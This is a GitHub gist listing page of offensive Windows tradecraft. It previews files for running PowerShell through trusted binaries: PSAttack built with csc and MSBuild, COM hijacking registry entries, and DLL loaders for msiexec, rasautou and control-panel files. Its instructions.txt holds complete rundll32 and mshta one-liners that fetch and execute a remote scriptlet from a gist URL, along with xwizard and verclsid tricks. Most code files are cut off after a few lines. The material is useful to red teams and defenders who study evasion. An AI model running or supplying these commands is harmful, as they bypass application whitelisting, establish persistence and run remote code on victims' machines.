View PSA64.cs
This file has been truncated, but you can view the full file.
//Credits to Casey Smith for his initial research here "https://gist.github.com/subTee/ca477b4d19c885bec05ce238cbad6371" | |
//Based on Jared Haight work (https://github.com/jaredhaight/PSAttack) | |
//1. Compile "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /out:PSA64.exe PSA64.cs" | |
using System; | |
using System.Reflection; | |
namespace PSA64 | |
{ | |
class Program |
View instructions.txt
xwizard RunWizard {00000001-0000-0000-0000-0000FEEDACDC} | |
verclsid.exe /S /C {00000001-0000-0000-0000-0000FEEDACDC} | |
create new folder and rename file.{00000001-0000-0000-0000-0000FEEDACDC} | |
rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";o=GetObject("script:https://gist.githubusercontent.com/NickTyrer/0598b60112eaafe6d07789f7964290d5/raw/7717cfad109fc15a6796dd9119b0267f7a4df3fd/power.sct");close(); | |
mshta javascript:o=GetObject("script:https://gist.githubusercontent.com/NickTyrer/0598b60112eaafe6d07789f7964290d5/raw/7717cfad109fc15a6796dd9119b0267f7a4df3fd/power.sct");o.Exec();close(); |
View powersct.sct
<?xml version="1.0" encoding="utf-8"?> | |
<package> | |
<component | |
id="dummy"> | |
<registration | |
description="dummy" | |
progid="dummy" | |
version="1.00" | |
remotable="True"> | |
<script |
View fsharp.fsscript
#r @"C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" | |
open System.Management.Automation | |
open System.Management.Automation.Runspaces | |
open System | |
let runSpace = RunspaceFactory.CreateRunspace() | |
runSpace.Open() | |
let pipeline = runSpace.CreatePipeline() |
View com_hijack.reg
Windows Registry Editor Version 5.00 | |
[HKEY_CURRENT_USER\Software\Classes\CLSID\{97d47d56-3777-49fb-8e8f-90d7e30e1a1e}] | |
[HKEY_CURRENT_USER\Software\Classes\CLSID\{97d47d56-3777-49fb-8e8f-90d7e30e1a1e}\InProcServer32] | |
@="C:\\Users\\Administrator\\Documents\\Visual Studio 2015\\Projects\\ClassLibrary2\\ClassLibrary2\\bin\\x86\\Debug\\ClassLibrary2.dll" |
View file.rsp
REGSVR odbcconf.dll |
View msiexec.cs
// msiexec /z "full path to msiexec.dll" | |
using System; | |
using System.Runtime.InteropServices; | |
using RGiesecke.DllExport; | |
using System.Collections.ObjectModel; | |
using System.Management.Automation; | |
using System.Management.Automation.Runspaces; | |
using System.Text; |
View PSA_MSBUILD64.csproj
This file has been truncated, but you can view the full file.
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> | |
<!-- Based on Casey Smith work (https://gist.github.com/subTee/ca477b4d19c885bec05ce238cbad6371), --> | |
<!-- Based on Jared Haight work (https://github.com/jaredhaight/PSAttack), --> | |
<!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe PSA_MSBUILD64.csproj --> | |
<Target Name="PSAttack"> | |
<PSA_MSBUILD64 /> | |
</Target> | |
<UsingTask | |
TaskName="PSA_MSBUILD64" |
View rasautou.cs
using System; | |
using System.Runtime.InteropServices; | |
using RGiesecke.DllExport; | |
using System.Management.Automation; | |
using System.Collections.ObjectModel; | |
using System.Text; | |
// compile using unmanaged exports and referencing system.management.automation | |
// rasautou -d powershell.dll -p powershell -a a -e e |
View cpl.cs
using System; | |
using System.Runtime.InteropServices; | |
using RGiesecke.DllExport; | |
using System.Collections.ObjectModel; | |
using System.Management.Automation; | |
using System.Management.Automation.Runspaces; | |
using System.Text; | |
public class Test | |
{ |
NewerOlder